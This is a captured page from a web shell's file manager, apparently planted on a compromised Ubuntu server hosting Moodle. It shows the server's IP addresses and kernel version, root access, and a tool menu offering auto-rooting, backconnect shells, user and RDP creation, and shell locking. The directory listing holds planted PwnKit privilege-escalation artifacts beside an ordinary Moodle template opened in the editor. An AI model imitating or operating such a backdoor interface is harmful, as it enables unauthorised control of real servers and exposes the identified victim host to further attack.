Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
h5pactivity /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
local
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
attempt.mustache
3.48
KB
-rwxrwxrwx
attempts.mustache
5.31
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
reportattempts.mustache
5.09
KB
-rwxrwxrwx
reportlink.mustache
1.09
KB
-rwxrwxrwx
reportresults.mustache
2.73
KB
-rwxrwxrwx
result.mustache
3.85
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : result.mustache
{{! This file is part of Moodle - http://moodle.org/ Moodle is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Moodle is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with Moodle. If not, see <http://www.gnu.org/licenses/>. }} {{! @template mod_h5pactivity/result This template will render a result choices inside a H5P activity results report. Variables required for this template: * description - Result description text * score - Score string (for example: 2 out of 4) Variables optional for this template: * hasoptions - If an option table must be present * optionslabel - The right label for available options on this result type * options - An array of mod_h5pactivity/local/result/options compatible array * content - Extra content in HTML * track - Indicate if the result has displayable tracking Example context (json): { "timecreated": "1587655101", "interactiontype": "choice", "description": "Example of some results", "rawscore": "4", "maxscore": "4", "duration": "130", "completion": "1", "success": "1", "hasoptions": true, "optionslabel": "Choice", "options": [ { "description": "Choice 1 text", "id": 0, "useranswer": { "answer": "Correct answer", "pass": true }, "correctanswer": { "answer": "Answer checked", "checked": true } }, { "description": "Choice 2 text", "id": 1, "useranswer": { "answer": "Wrong answer", "fail": true }, "correctanswer": { "answer": "Answer checked", "unchecked": true } }, { "description": "Choice 3 text", "id": 2, "useranswer": { "answer": "This was the correct text", "correct": true }, "correctanswer": { "answer": "This was the correct text", "text": true } }, { "description": "Choice 4 text", "id": 3, "correctanswer": { "answer": "Some text", "text": true } }, { "description": "Choice 4 text", "id": 3, "useranswer": { "answer": "Some wrong text", "incorrect": true } } ], "score": "4 out of 4", "content": "<p>This is an optional extra content in <b>HTML</b>.</p>", "track": true } }} <div class="container-fluid w-100 my-0 p-0"> <div class="row w-100 py-3 px-1 m-0 p-md-3"> {{>mod_h5pactivity/local/result/header}} {{{content}}} {{#hasoptions}} {{>mod_h5pactivity/local/result/options}} {{/hasoptions}} {{^track}} <div class="alert alert-warning w-100" role="alert"> {{#str}}no_compatible_track, mod_h5pactivity, {{interactiontype}}{{/str}} </div> {{/track}} </div> </div>
Close